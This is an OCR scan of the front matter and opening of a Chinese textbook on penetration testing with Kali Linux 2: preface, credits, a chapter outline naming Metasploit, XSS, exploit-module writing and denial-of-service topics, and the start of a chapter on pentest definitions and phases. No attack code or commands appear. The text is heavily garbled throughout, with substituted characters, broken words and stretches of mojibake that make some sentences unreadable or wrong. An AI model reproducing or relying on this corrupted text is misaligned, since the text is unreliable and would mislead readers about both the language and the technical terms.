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内 容 拓 要 


Kali 十 世界 滩 踪 误 试 行业 公认 的 优 夯 的 网 络 安全 审计 工具 集合 ， 它 
可 以 通过 对 设备 的 探测 来 审计 其 安全 性 ， 而 且 功 能 完备 ， 几 乎 包含 了 目 
前 所 有 的 热门 工具。 


本 书 由 资深 的 网 络 安全 领域 的 教师 编写 完成 ， 全 书 共 16 章 ， 内 容 转 
绕 如 何 使 用 Kali 这 球 网 络 安全 审计 工具 集合 展开 。 本 书 涉 及 网 络 安全 渗 
透 测 试 的 相关 理论 和 工具 、Kali Linux 2 使 用 基础 、 被 动 扫 描 、 主 动 扫 
描 、 漏 洞 扫 摘 、 远 程控 制 、 渗 透 攻 击 、Armitage、 社 会 工程 学 工具 、 
BeEF-XSSI23&TEAZBR. Jii xA). P128 P] AXE EX Us. 
n ad 无 线 安全 渗透 测试 、 拒 绝 服务 攻击 、 渗 透 测 试 报告 的 编 
写 等 内 容 。 


本 书面 加 网络 安全 渗透 测试 人 员 、 运 维 工 程 师 、 网 络 管理 人 员 、 网 
络 安 全 设备 设计 人 员 、 网 络 安全 软件 开发 人 员 、 安 全 访 程 培训 人 员 、 癌 
校 网 络 安全 专业 方 同 的 学 生 等 。 谈 者 将 从 书 中 学 习 到 实用 的 守 例 和 操作 
技巧 ， 更 好 地 运用 Kali Linux 2 的 工具 和 功能 。 


拉 术 审 校 者 简介 


BKAT 


XE — BLKWAOBCEEH miiti, WERP ER, MER 
MARIER Y TRE CES HEEN. n AE, IEAXEEH T RES) A 7J 
和 乔 芒 才 保 证 了 本 书 的 顺利 完成 。 

IKE m 


此 二 人 有 着 丰富 的 Web 开 发 经 验 ， 他 们 共同 完成 了 本 书 Web 相 关 部 
分 的 内 容 审 校 和 修订 工作 。 
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完成 了 本 书 软件 调试 和 漏洞 渗透 部 分 的 内 容 审 校 和 修订 工作 。 


FER 

长 期 从 事 网 络 设计 方面 的 工作 ， 相 关 经 验 非 党 丰富 ， 目 前 正在 主讲 
MPLS 与 VPN 方 面 的 高 级 网 络 课程 ， 她 完成 了 本 书 网 络 相关 部 分 的 内 容 
审 校 和 修订 工作 。 


HF 
如 何 正 确 地 运用 网 络 攻 防 技术 


我 们 暂且 不 谈 Kali， 先 来 谈 谈 黑 客 。 

长 期 以 来 ， 黑 客 在 人 们 心目 中 都 是 一 个 神秘 的 职业 。 但 是 ， 在 人 们 
心目 中 这 个 职业 为 社会 市 来 的 好 像 更 多 的 是 负面 的 影响 ， 因 为 只 要 一 提 
到 黑客 ， 就 会 和 攻击 、 泄 密 和 破坏 这 些 词汇 联系 到 一 起 。 然 而 事实 确实 
如 此 吗 ? 在 现实 生活 中 普通 人 很 难 见 到 从 事 这 个 职业 的 人 ， 不 过 在 影视 
作品 中 出 现 的 黑客 往往 具备 两 个 特点 : 足够 聪明 ， 喜 欢 单 干 。 其 实在 现 
实生 活 中 ， 黑 客 的 年 龄 从 十 几 风 到 几 十 风 不 等 ， 他 们 从 事 看 各 种 各 样 的 
职业 ， 他 们 可 能 精通 从 编号 病毒 到 漏洞 测试 的 各 种 技能 中 的 某 一 项 。 

虽然 近年 来 ， 我 们 经 部 可 以 看 到 “条 天 才 黑 客 和 被 大 企业 以 天 价 年 薪 
招安 ”的 新 闻 ， 但 是 绝 大 多 数 的 黑客 却 并 没有 这 么 好 的 机 会 ， 他 们 的 才 
华 很 难得 到 社会 的 肯定 ， 要 么 没有 企业 接纳 他 们 ， 要 么 企业 接纳 他 们 之 
后 没有 合适 的 周 位 。 所 以 很 多 拥有 天 赋 的 黑客 选择 了 逛 而 走 险 ， 利 用 上 自 
己 的 技术 走 上 了 违法 的 道路 。 

就 在 不 久 前 ， 我 的 一 个 大 学 同学 创办 的 公司 推出 了 一 款 新 的 行业 软 
件 。 这 款 软 件 的 前 景 十 分 光明 ， 一 时 间 几 乎 垄断 了 某 省 份 该 类 软件 的 全 
部 市 场 份额 。 可 是 好 景 不 长 ， 束 在 这 球 软 件 投入 部 署 不 久 ， 研 发 部 门 收 
到 了 一 封 匿 名 邮件 。 这 封 邮 件 清楚 地 指出 了 该 软件 存在 漏洞 ， 并 且 这 个 
漏洞 会 导致 全 部 数据 库 信 息 的 泄露 。 匿名 邮件 发 送 人 开 出 了 一 个 并 不 很 
融 的 价格 ， 公 要 文 付 吧 用 ， 束 个 会 公布 这 个 漏 滑 ， 并 会 提供 修复 的 信 


这 件 事 情 后 来 成 为 了 我 读音 上 的 一 个 经 典 案 例 ， 除 了 用 来 对 这 个 多 
型 漏洞 进行 分 析 之 外 ， 也 用 来 帮助 学 习 网 络 攻击 这 门 读 程 的 学 生 进 行 职 
业 生 涯 规划 。 网 络 攻击 是 计算 机 专业 中 一 个 比较 夯 英 的 读 程 ， 在 这 门 读 
上 讲述 每 一 种 拉 术 ， 每 一 种 工具 ， 长 至 每 一 个 思路 好 像 都 不 是 为 了 建 
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的 人 又 该 去 做 些 什 么 呢 ， 这 些 黑客 技术 能 否 用 在 正 途 上 呢 ? 

这 个 问题 的 答案 很 肯定 。 现 在 随 着 网 络 安全 越 来 越 受到 各 方面 的 重 
视 ， 一 个 新 兴 的 职业 正在 慎 劲 发 展 起 来 ， 那 束 是 网 络 安全 渗透 测试 。 在 
国外 ， 出 现 了 很 多 专门 提供 这 个 服务 的 企业 ; 在 国内 ， 虽 然 起 步 较 晚 ， 
(B B xe AU 3ES SI Nu. 

网 络 安全 渗透 测试 严格 的 定义 应 该 是 一 种 针对 目标 网 络 进行 安全 检 
测 的 评估 。 通 常 这 种 测试 由 专业 的 网 络 安全 渗透 测试 专家 完成 ， 目 的 是 
发 现 目 标 网 络 存在 的 漏洞 以 及 安全 机 制 方面 的 隐患 并 提出 改善 方法 。 从 
事 网 络 安全 渗透 测试 的 专业 人 员 会 采用 和 黑客 相同 的 方式 对 目标 进行 入 
侵 ， 这 样 束 可 以 检测 网 络 现 有 的 安全 机 制 是 否 足 以 抵挡 恶意 的 攻击 。 

网 络 安全 渗透 测试 专家 将 会 像 墨客 一 样 思考 ， 在 别有用心 的 人 之 前 
找 出 目标 的 问题 ， 提 前 采取 预防 手段 。 

但 是 一 个 出 色 的 黑客 并 不 一 定 就 是 一 个 合格 的 网 络 安全 渗透 测试 专 
家 。 因 为 很 多 黑客 只 掌握 了 众多 技术 中 的 一 种 ， 他 们 在 某 一 个 领域 出 类 
拔 禁 ， 但 是 可 能 对 男 一 个 领域 量 无 所 知 。 而 网 络 安 全 渗透 测试 专家 必须 
掌握 全 面 的 知识 。 

本 书 讲 解 了 大 量 的 网 络 安 全 渗透 测试 的 实例 ， 希 望 能 为 各 位 有 志 于 
从 事 这 个 行业 的 读者 提供 一 些 帮助 。 祝 各 位 成 为 网 络 安全 渗透 测试 方面 
的 优秀 人 才 ， 为 我 国 的 网 络 安全 与 信息 安全 事业 作出 贡献 。 


李 华 峰 


2018 年 1 月 于 唐山 


致谢 


多 年 前 ， 我 曾经 领略 了 传奇 黑客 工具 BO2K 的 神奇 ， 对 这 款 工 具 的 
创造 者 一 一 “ 死 牛 之 条”(The Cult of the Dead Cow, CDC) 也 是 极为 仰 
茶 。 不 过 在 许多 年 之 后 ， 我 才 知 晓 “ 死 牛 之 案 ” 并 非 是 一 个 人 ， 而 是 一 个 
团体 。“ 死 牛 之 案 ” 由 很 多 人 组 成 ， 有 趣 的 是 ， 他 们 中 有 的 人 完全 不 异 密 
但 学 ， 有 的 人 又 不 怎么 了 解 软件 调试 技术 ， 但 是 他 们 中 的 每 个 人 都 有 目 
己 独 特 的 扩 能 。 单 独 来 看 这 些 人 中 的 每 一 个 ， 可 能 都 不 是 一 个 理想 的 黑 
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在 本 书 的 编写 过 程 中 ， 我 曾经 一 度 感到 十 分 迷 汇 ， 网 络 安全 渗透 测 
试 需 要 极为 全 面 的 知识 和 扩 能 。 因 为 现实 中 的 网 络 安 全 渗透 负 试 用 “二 
里 之 堤 ， 江 于 蚁 穴 ” 来 形容 是 再 为 贴切 不 过 了 ， 任 何 一 个 方面 出 错 ， 都 
会 影响 到 整个 测试 的 成 功 与 否 。 现 在 既然 要 系统 地 讲解 网 络 安全 渗透 测 
试 ， 那 么 如 何 能 将 各 种 渗透 测试 的 技能 乔 完 整 而 义 准确 的 介绍 出 来 ， 这 
旦 一 个 十 分 严峻 的 挑 成 。 受 到 * 死 牛 之 祭 ” 的 司 及 ， 我 想 为 什么 不 去 建立 
一 个 技能 全 面 的 团队 呢 ? 好 吧 ， 事 实 上 我 芮 的 这 样 去 做 了 。 和 幸运 的 是 ， 
在 短 短 的 时 间 里 ， 一 些 有 着 丰富 经 验 的 老手 们 纷纷 加 入 了 本 书 的 编号 和 
审 校 团 队 。 十 分 感谢 他 们 的 参与 和 热情 ! 本 书 的 完成 包含 看 你 们 辛 动 的 
付出 。 感 谢 人 民 邮 电 出 版 社 的 明俊 灭 编 辑 ， 在 本 书 的 编写 过 程 中 始终 文 
持 我 的 写作 ， 正 是 她 的 误 励 和 帮助 ， 我 才能 顺利 完成 全 部 书 往 。 
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时 至 今日 ， 网 络 安全 问题 已 经 成 为 社会 热点 中 的 热点 。 随 着 近年 来 
网 络 和 计算 机 的 安全 越 来 越 受 重视 ， 渗 透 测试 技术 已 经 成 为 网 络 安全 研 
究 的 核心 问题 。 而 渗透 测试 的 成 功 与 否 又 取决 于 对 目标 信息 的 掌握 情 
况 ， 这 就 要 求 渗透 测试 者 必须 精通 网 络 安 全 审计 技术 。 尤 其 是 对 网 络 的 
保护 者 来 说 ， 精 通 网 络 安全 审计 技术 ， 意 味 着 可 以 先 于 攻击 者 发 现 网 络 
和 计算 机 的 漏洞 ， 从 而 有 效 地 避免 来 自 于 企业 内 部 和 外 部 的 威胁 。 因 此 
无 论 是 安全 渗透 测试 人 员 、 网 络 管理 人 员 、 网 络 安全 设备 和 安全 软件 开 
发 人 员 的 工作 都 包含 了 网 络 安全 审计 技术 。 目 前 ， 国 内 的 网 络 安全 正 处 
于 起 步 阶 段 ， 大 家 所 使 用 的 工具 多 种 多 样 ， 缺 乏 先进 、 专 业 、 完 善 的 学 
习 资料 ， 基 本 上 都 是 依靠 摸索 学 习 。 

而 Kali 是 世界 渗透 测试 行业 公认 的 优秀 的 网 络 安全 审计 工具 集合 ， 
它 可 以 通过 对 设备 的 探测 来 审计 它 的 安全 性 ， 而 且 功 能 极为 完备 ， 几 笠 
包含 了 目前 所 有 的 热门 工具 。Kali 的 强大 功能 是 组 良 置疑 的 ， 它 几乎 是 
必 备 工 具 ， 你 几乎 可 以 在 任何 经 典 的 网 络 安全 图 书 中 找到 它 的 名 字 ， 甚 
至 可 以 在 大 量 的 影视 作品 (例如 最 新 的 《黑客 兵团 》 等 ) 中 看 到 Kali 的 
身影 。 现 在 ， 国 内 对 于 Kali 的 研究 也 越 来 越 热 。 近 年 来 正 是 国内 网 络 安 
全 飞速 发 展 的 阶段 ，Kali 这 个 曾经 只 有 顶尖 高 手 才 会 涉及 的 工具 ， 也 逐 
步 走 入 了 普通 网 络 安全 工作 人 员 的 “寻常 百姓 家 ”， 从 而 受到 了 广大 网 络 
安全 从 业 人 员 的 喜爱 。 假 以 时 日 ， 它 势必 将 成 为 国内 流行 的 网 络 安全 审 
计 工具 。 本 人 从 2009 年 开始 正式 涉足 网 络 渗透 领域 ， 对 于 Kali 的 使 用 ， 
花费 了 大 量 的 时 间 和 精力 进行 研究 ， 尤 其 是 阅读 了 大 量 国外 的 相关 文 
献 。 在 本 书 中 将 会 分 享 自己 学 习 Kali 的 使 用 经 验 、 方 法 ， 并 对 其 精心 江 
总 ， 希 望 可 以 减少 其 他 Kali 学 习 者 的 学 习 成 本 。 

本 书 将 Kali 应 用 实例 与 网 络 原理 相 结合 进行 讲解 ， 不 仅 讲述 Kali 的 
实际 应 用 方法 ， 还 将 从 内 部 原理 的 角度 来 分 析 Kali 实 现 网 络 安全 审计 的 
技术 ， 实 现 了 将 各 种 网 络 协议 、 各 种 数据 包 格式 等 知识 与 Kali 的 实践 应 


读者 对 象 


本 书 的 读者 对 象 如 下 : 
e 网络 安全 渗透 训 试 人 员 
运 维 工程 师 
Pd et^ Er EB vo RU 4E MV p^ 
计算 机 相关 专业 的 学 生 
网 络 安全 设备 设计 与 安全 软件 开 友 人 员 
安全 课程 培训 人 员 


如 何 阅 读本 书 


书 的 结构 是 按照 渗透 测试 的 流程 来 展开 编写 的 ， 全 书 内 容 共 分 为 

163i. 
TR1* “网络 安全 渗透 测试 的 相关 理论 和 工具 ”， 这 一 章 对 什么 是 网 
络 安 全 渗透 测试 ， 以 及 如 何 开 展 网 络 安 全 渗透 测试 进行 了 介绍 。 

第 2 章 “Kali Linux 2 使 用 基础 ?详细 地 讲解 了 Kali Linux 2 的 安装 和 使 
用 o 

第 3 草 “做 动 im ESTNE D 扫 摘 是 整个 渗透 测试 过 程 中 极为 重要 
的 一 个 阶段 。 这 一 章 介 绍 了 间接 扫 摘 中 优秀 的 3 种 工具 ， 分 别 征 
Maltego. Recon-NG. ZoomEye. 

"BAN “主动 扫 接 ”以 Nmap 为 工具 ， 详 细 地 介绍 了 主动 扫描 的 各 种 方 
iss 

第 5 章 “ 漏 铜 扫 摘 ?个 绍 了 在 漏洞 扫 摘 阶段 需要 完成 的 任务 。 

POR “远程 控制 ?以 Android 和 Windows 作 为 目标 平台 ， 通 过 实例 介 
绍 了 Metasploit 框 架 中 提供 的 优秀 工具 Meterpreter。 

第 7 章 “渗透 攻击 ”以 网 络 安全 渗透 测试 工具 Metasploit 的 正式 介绍 作 
为 开头 ， 然 后 以 实例 的 形式 开始 介绍 Metasploit 杠 架 的 使 用 方法 。 

第 8 章 “Armitage” 引 入 了 Metasploit 的 图 形 化 操作 界面 一 Armitage， 
这 是 一 款 由 Java 开 发 的 工具 。 

第 9 草 “ 社 会 工程 学 工具 ?”， 在 这 一 章 中 介绍 了 Kali Linux 2 中 社会 工 
程 学 工具 包 的 基本 使 用 方法 ， 工 其 包 social-engineer-toolkit 提 供 了 大 量 成 
鸣 的 社会 工程 学 攻击 方式 ， 随 后 惑 其 中 最 为 经典 的 儿 种 方式 进行 了 介 


2, 
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XSS (路 站 脚本 攻击 ) ， 这 是 一 种 令 人 防不胜防 的 渗透 方式 ， 用 户 往往 


只 是 访问 了 和 恶意 攻击 者 建立 的 网 站 束 会 被 渗透 。 

第 11 章 “漏洞 渗透 模块 的 编写 ”针对 一 个 特定 漏洞 进行 渗透 模块 开 
发 ， 这 是 一 个 存在 于 FreeFloat FIP ServerfA F IRR dis E 2S0 hd [n] o 

第 12 章 “网 络 数 据 的 别 探 与 鞭 驳 ”人 外 绍 了 如 何在 网 络 中 进行 噢 探 和 其 
骗 ， 这 是 极为 有 效 的 一 种 攻击 方式 。 

第 13 章 “身份 认证 攻击 ”介绍 了 一 些 网 络 渗透 中 常见 的 密码 破解 方 
Tos 

第 14 音 “无线 安 全 渗透 测试 "总结 了 无 线 网 络 的 各 种 渗透 方式 。 

第 15 章 “拒绝 服务 攻击 ”， 按 照 TCP/IP 协 议 的 结构 ， 依 次 介绍 了 数据 
链 路 层 、 网 络 层 、 传 输 层 和 应 用 层 中 的 协议 漏洞 ， 并 讲解 了 如 何 利 用 这 
些 漏洞 来 发 起 拒绝 服务 攻击 。 

第 16 音 “渗透 测试 报告 的 编写 ?介绍 了 渗透 测试 报告 的 编写 规范 及 包 
含 的 内 容 ， 并 介绍 了 Kali Linux 2 中 最 为 优秀 的 测试 报告 编写 工具 Dradis 
的 使 用 方法 。 

大 家 可 以 根据 目 己 的 需求 选择 阅读 侧重 点 ， 不 过 还 是 布 望 能 够 按照 
顺序 来 阅读 ， 这 样 不 仅 可 以 对 渗透 测试 有 一 个 清晰 的 认识 ， 还 可 以 对 渗 
透 测 试 中 的 技术 有 一 个 简单 的 对 比 。 


作者 和 编辑 尽 最 大 努力 来 确 你 书 中 内 容 的 准确 性 ， 但 难免 还 会 存在 
到 错 。 欢 迎 您 将 发 现 的 问题 告诉 我 们 ， 帮 助 我 们 提升 图 书 的 质量 。 

当 您 发 现 错误 时 ， 请 登录 异步 社区 主页 https:Wwww.epubit.com/， 搜 
过 到 本 书页 面 ， 点 击 “ 提 有 交 勘 误 ”"， 相 应 输入 信息 ， 最 后 单 击 “ 提 交 ” 投 钮 
则 可 。 之 后 本 书 的 作者 和 编辑 会 对 您 提交 的 勘误 进行 审核 。 人 确认 并 接受 
后 ， 您 将 获 赠 异步 社区 的 100 积 分 。 积 分 可 用 于 在 社区 匈 换 优惠 券 ， 以 
及 兄 换 样 书 或 奖品 之 用 。 





与 我 们 联系 


我 们 的 联系 邮箱 是 contact@epubit.com.cn。 

如 果 您 对 本 书 有 任何 疑问 或 建议 ， 请 发 邮件 到 此 邮箱 ， 邮 件 标题 中 
请 注 明 本 书 书 名 。 

如 来 您 有 兴趣 出 版 图 书 、 有 录制 教学 视频 ， 或 参与 图 书 翻 详 、 技 术 审 
校 等 工作 ， 可 以 友 邮 件 ， 或 者 到 卉 步 社区 在 线 提交 投 称 : 

www.epubit.com/selfpublish/submission 

如 果 您 是 学 校 、 培 训 机 构 或 企业 ， 想 批量 购买 本 书 或 异步 社区 出 版 
的 其 他 图 书 ， 请 及 邮件 联系 我 们 。 

如 来 您 在 网 上 友 现 有 针对 弄 步 图 书 的 各 种 形式 的 盗版 行为 ， 包 括 图 
书 或 部 分 内 容 的 非 授 权 传 播 ， 请 您 将 怀疑 有 侵权 行为 的 链接 友 邮 件 给 我 
ee NUMINE 
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异步 社区 是 人 民 邮 电 出 版 社 旗 下 IT 专业 图 书社 区 ， 致 力 于 出 版 精品 
IT 拉 术 图 书 和 相关 学 习 产 品 ， 为 作 详 者 提供 优质 出 版 服务 ， 社 区 创办 于 
2015 年 8 月 ， 提 供 超 过 1000 种 图 书 、 近 1000 种 电子 书 ， 以 及 众多 技术 文 
革 和 视频 识 程 。 更 多 评 情 请 访问 异步 社区 官网 https://www.epubit.com。 

异步 图 书 是 由 异步 社区 编辑 团队 策划 出 版 的 精品 I 开 专业 图 书 品 牌 ， 
依托 于 人 民 邮 电 出 版 社 近 30 年 的 计算 机 图 书 出 版 积 宗 和 专业 编辑 团队 ， 
在 封 务 上 印 有 有 寞 步 图 书 的 LOGO。 我 们 的 出 版 领域 包括 软件 开 友 、 大 数 
$5. AL MA Mim PjfET€ NAA. 
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第 1 章 


网 络 安 全 滩 史 测试 的 相关 理论 和 工具 


在 类 国 者 名 电影 《 金 暗 脱 元 》 中 ， 雷 -布雷 斯 林 是 这 个 世界 上 最 强 
的 越狱 咒 手 之 一 ， 他 在 过 去 8 年 的 时 间 内 成 功 地 从 14 所 守卫 蜗 度 森严 的 
音 型 监狱 中 逃 胶 。 即 便 如 此 ， 雷 :布雷 斯 林 却 并 不 是 一 个 非 犯 , 他 真实 
的 号 份 是 类 国 国家 安全 局 的 一 位 监狱 安全 专家 。 雷 布雷 斯 林 以 罪犯 的 
吴 份 进入 监狱 ， 寻 找 监狱 的 漏洞 。 而 他 的 每 一 次 成 功 越狱 ， 束 代表 看 他 
己 经 找 出 了 这 个 监狱 安全 方面 的 漏 铜 。 当 然 雷 ' 布 雷 斯 林 的 目的 并 不 是 
为 了 破坏 ， 而 征 为 了 确保 监狱 中 每 一 个 服刑 的 非 犯 都 无 法 逃 胶 。 他 的 每 
一 雇 成 功 越 狱 ， 祁 会 使 监狱 变 得 更 加 坚固 ， 因 此 他 是 一 个 合法 的 越狱 
者 。 剧 中 的 雷 - 布 雷 斯 林 由 我 最 品 欢 的 影星 西 尔 维 斯 特 : 史 泰 龙 所 饰演 。 


随 看 目前 网 络 的 迅 狐 友 展 ， 人 们 也 开始 越 来 越 重视 网 络 的 安全 问 
题 。 一 个 网 络 的 安全 机 制 无 论 设计 得 多 么 精准 ， 都 可 能 存在 人 不易 察 和 的 
ca 
而 生 。 

如 果 你 是 第 一 次 接触 到 网 络 安 全 渗透 测试 这 个 问题 的 话 ， 可 能 会 对 
此 充满 好 可 和 期 每 。 那 么 在 这 一 章 中 我 们 将 从 以 下 3 个 主题 展开 对 网 络 
TEPEK 73 - 

。 网 络 安全 渗透 测试 的 概念 
。 网 络 安 全 渗透 测试 的 执行 标准 


。 JAZEERA HLEH 


1.1 网 络 安全 渗透 测试 的 概念 


在 开始 正 却 学 习 之 前 ， 我 们 先 来 了 解 一 下 网 络 安全 渗透 负 试 。 长 期 
以 来 ， 很 多 人 虱 认 为 网 络 安全 渗透 测试 束 古 使 用 扫 插 工具 找 出 系统 的 漏 
桐 ， 其 至 经 第 有 一 些 刚刚 入 行人 不久 的 网 络 安全 浴 史 测试 的 从 业 人 员 也 这 
样 认 为 。 基 于 这 样 的 理解 ， 很 多 人 在 测试 过 程 中 会 仅仅 使 用 漏 铜 扫描 工 
具 对 目标 进行 扫 撕 。 漏 洞 扫 拉 的确 很 重要 ， 但 是 它 只 能 是 整个 网 络 安全 
渗透 测试 的 一 部 分 。 实 际 上 大 多 数 时 候 漏洞 扫描 的 结果 也 仅仅 是 能 够 反 
了 映 出 目标 是 否 及 时 安 帮 了 系统 更 新 。 


可 征 网 络 安全 渗透 测 记 是 什么 呢 ? 


实际 上 网 络 安全 渗透 测试 严格 的 定义 应 该 是 一 种 针对 目标 网 络 进 行 
安全 检测 的 评 佑 。 通 第 这 种 测试 由 专业 的 网 络 安全 渗透 测试 专家 完成 ， 
目的 是 友 现 目标 网 络 存 在 的 漏洞 以 及 安全 机 制 方面 的 隐患 并 所 出 改善 方 
法 。 从 事 渗透 训 试 的 专业 人 员 会 采用 和 黑客 相同 的 方式 对 目标 进行 入 
侵 ， 这 样 融 可 以 检测 网 络 现 有 的 安全 机 制 是 否 足 以 抵挡 悉 意 的 攻击 。 


根据 事先 对 日 标 信息 的 了 解 程度 ， 网 络 安全 渗透 测试 的 方法 有 黑 例 
MA A AMAMA MARR . 
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试 人 员 先 期 对 日 标 网 络 的 内 部 结构 和 所 使 用 的 程序 完全 不 了 解 ， 从 网 络 
外 部 对 其 网 络 安全 进行 评 信 。 黑 盒 测试 中 需要 耗 泪 大 量 的 时 间 来 完成 对 
目标 信息 的 收集 。 除 此 之 外 ， 漂 盒 测试 对 渗透 测试 人 员 的 要 求 也 是 最 局 


盒 测 试 也 被 称 作 内 部 测试 。 在 进行 和 白 盒 测试 时 ， 渗 透 测 试 人 员 必 
须 事先 清楚 地 知道 被 测试 环境 的 内 部 结构 和 技术 细节 。 相 比 起 黑 盒 测 斌 
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象 ， 相 比 起 黑 合 测试， 日 盒 测 试 能 够 给 目标 市 来 更 大 有 的 价值 。 

K ARMAAN ERMA SEH, MWEKA KAMAT, 
透 测试 人 员 只 能 了 解 部 分 目标 网 络 的 信息 ， 但 不 会 学 握 网 络 内 部 的 工作 
原理 和 那些 限制 信息 。 


网 络 安全 渗透 测试 的 目标 包括 一 切 和 网 络 相 关 的 基础 设施 ， 其 中 包 
括 以 下 方面 。 


。 网 络 设备 ， 主 要 包含 连接 到 网 络 的 各 种 物理 实体 ， 例 如 路 由 器 、 交 
换 机 、 防 火 墙 、 无 线 接 入 点 、 服 务 器 、 个 人 计算 机 等 。 


e 操作 系统 是 指 省 理 和 控制 计算 机 硬件 与 软件 资源 的 计算 机 程序 ， 例 
如 个 人 计算 机 常 使 用 的 Windows 7. Windows 10 等 ， 服 务 器 上 经 和 常 
使 用 的 Windows 2012 和 各 种 Linux。 

物理 安全 ， 主 要 是 指 机 房 环 境 、 通 信 线 路 等 。 

应 用 程序 ， 主 要 是 为 针对 菜 种 应 用 目的 所 使 用 的 程序 。 


党 理 制 度 ， 这 部 分 其 实 是 全 部 目标 中 最 为 重要 的 ， 指 的 是 为 你 证 网 
络 安全 对 使 用 者 近 出 的 要 求 和 做 出 的 限制 。 

网 络 安 全 渗透 测试 的 成 来 退 第 是 一 份 报告 。 这 个 报告 中 应 当 给 出 目 
标 网 络 中 存在 的 威胁 ， 以 及 威胁 的 影响 程度 ， 并 给 出 对 这 些 威胁 的 改进 
建议 和 修复 方 采 。 


另外 需要 注意 的 一 点 是 ， 网 络 安全 渗透 测试 并 不 能 等 同 于 黑客 行 
为 。 相 比 起 黑客 行为 ， 网 络 安全 渗透 测试 具有 以 下 几 个 特点 ; 


。 网 络 安全 渗透 测试 是 商业 行为 ， 要 由 客户 主动 提出 ， 并 给 与 授权 许 
可 才 可 以 进行 。 


e 网 络 安全 渗透 测试 必须 对 目标 进行 整体 性 评 佑 ， 进 行 尽 可 能 全 面 的 
分 析 。 


e 了 网络 安全 渗透 测试 的 目的 是 为 了 改善 用 户 的 网 络 安全 机 制 。 


1.2 ”网 络 安 全 渗透 调试 的 执行 标准 


作为 网 络 安全 渗透 测试 的 执行 者 ， 我 们 自 完 要 明确 在 整个 渗透 测试 
过 程 中 需要 进行 的 工作 。 当 我 们 接收 到 客户 的 渗透 测试 任务 时 ， 往 往 对 
于 所 要 进行 测试 的 目标 知之 甚 少 甚 至 一 无 所 知 。 而 在 渗透 测试 结束 的 时 
候 ， 我 们 对 目标 的 了 解 程度 已 经 远 远 超过 了 客户 。 这 个 期 间 ， 我 们 要 从 
事 大 量 的 研究 和 工作 ， 根 据 pentest-standard.org 给 出 的 渗透 测试 执行 标 
准 ， 整 个 渗透 测试 过 程 中 工作 可 以 分 成 如 下 7 个 阶段 。 
前 期 与 客户 的 交流 阶段 。 
情报 的 收集 阶段 。 
威胁 建 模 阶段 。 
漏洞 分 析 阶 段 。 
漏洞 利用 阶段 。 
后 渗透 攻击 阶段 。 


报告 了 上 段 。 


这 个 阶段 中 渗透 测试 者 需要 得 到 客户 的 配合 来 确定 整个 渗 适 测试 的 
要 确定 是 对 目标 的 哪些 设备 和 哪些 问题 进行 测试 。 而 这 
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1. 渗透 测试 的 目标 


通常 这 个 目标 会 是 一 个 包含 了 很 多 主机 的 网 络 。 这 时 我 们 需要 确定 
的 是 渗透 测试 所 涉及 的 IP 地 址 范围 和 域名 范围 。 但 是 客户 所 使 用 的 Web 
应 用 程序 和 无 线 网 络 ， 甚 至 安保 设备 和 管理 制度 也 可 能 会 是 渗透 测试 的 
昌 标 。 同 样 需要 明确 的 还 有 ， 客 户 需要 的 是 全 面 评估 还 是 只 针对 其 中 茶 
一 方面 或 部 分 评估 。 


进行 渗透 测试 过 程 所 使 用 的 方法 如 下 : 

这 个 阶段 我 们 可 以 采用 的 方法 主要 有 黑 盒 测试 、 白 盒 测 试 和 灰 盒 测 
试 3 种 。 
2. 进行 渗透 测试 所 需要 的 条 件 


如 末 采 用 的 是 日 盒 测 试 ， 融 需要 客户 提供 测试 所 必需 的 信息 和 权 
上限， 客 记 最 好 可 以 接受 我 们 的 问 知 调 僵 。 确 定 可 以 进行 渗透 的 时 间 ， 例 
如 生 只 能 在 周末 进行 ， 还 是 随时 可 以 。 如 末 在 渗透 测试 过 程 中 导致 了 目 
标 有 党 到 了 和 破坏， 应 该 如 何 补 救 等 。 


3. 渗透 测试 过 程 中 的 限制 条 件 

在 整个 渗透 测试 过 程 中 ， 必 须 与 客户 明确 哪些 设备 不 能 进行 渗透 测 
试 ， 以 及 哪些 技术 不 能 应 用 。 另 外 也 需要 明确 在 哪些 时 间 点 不 能 进行 渗 
透 测试 。 
4， 渗 透 测试 过 程 的 工期 

根据 客户 的 需求 ， 我 们 需要 给 出 整个 渗透 测试 的 进度 表 。 客 户 可 以 
了 解 渗透 测试 的 开始 时 间 与 结束 时 间 ， 以 及 我 们 在 每 个 时 间 段 所 进行 的 
TM. 


5. 渗透 名 试 的 有 用 


这 个 话题 其 实 很 少 出 现在 一 本 教科 书 中 ， 但 是 这 恰恰 是 一 个 在 实践 

中 很 复杂 的 问题 ， 需 要 考虑 的 因素 很 多 。 例 如 我 们 在 对 一 个 拥有 了 100 

人 台 计 算 机 的 网 络 进 行 渗透 测试 的 时 候 ， 收 取 的 费用 为 10 万 元 ， 那 么 平均 

每 一 台 计 算 机 的 费用 就 是 1000 元 。 但 是 这 并 不 是 一 种 线性 的 关系 ， 如 果 

某 个 客户 只 要 求 我 们 对 1 人 台 计 算 机 进行 渗透 测试 的 话 ， 那 么 费用 就 不 能 

Ac 
| 
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作为 渗透 测试 者 必须 牢记 的 一 点 是 ， 我 们 并 非 黑客 。 友 现 目 标 和 存在 
的 漏洞， 获取 目标 的 控制 权限 ， 或 者 得 到 目标 的 官 理 窗 人 码 只 是 完成 了 一 
部 分 任务 。 我 们 还 需要 明确 香 户 期 副 在 渗透 训 试 结束 时 应 该 达到 什么 目 
标 ， 最 终 的 渗透 报告 应 该 包含 哪些 内 容 。 


1.2.2 ”情报 的 收集 阶段 


这 里 的 “情报 ? 指 的 是 目标 网 络 、 服 务 磺 、 应 用 程序 的 所 有 信息 。 滩 
透 测 试 人 员 和 需要 使 用 各 种 资源 尽 可 能 地 获取 要 测试 目标 的 相关 信息 。 


如 栗 我 们 现在 采用 了 墨盒 调试 的 方式 ， 那 么 这 个 阶段 可 以 说 是 整个 
渗透 训 试 过 程 中 最 为 重要 的 一 个 阶段 。 所 谓 “ 知 己 知 役 ， 昌 成 不 殉 ?也 正 
症 说 明了 情报 收集 的 重要 性 。 这 个 阶段 所 使 用 的 扩 术 也 可 以 分 成 两 种 。 


1. 1525/3418 
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同样 对 于 一 个 目标 网 络 来 说 ， 我 们 也 可 以 获得 很 多 信息 ， 比 如 现在 
我 们 仅仅 知道 客户 的 一 个 域名 www.testfire.net (这 是 美国 IBM 公 司 
提供 的 一 个 专门 用 来 进行 渗透 测试 训练 的 目标 ， 所 以 在 对 该 目标 进行 扫 
描 时 无 需 担 心 法 律 问题 ) 。 


通过 这 个 域名 我 们 就 可 以 使 用 Whois 来 查询 到 这 个 域名 所 有 者 的 联 





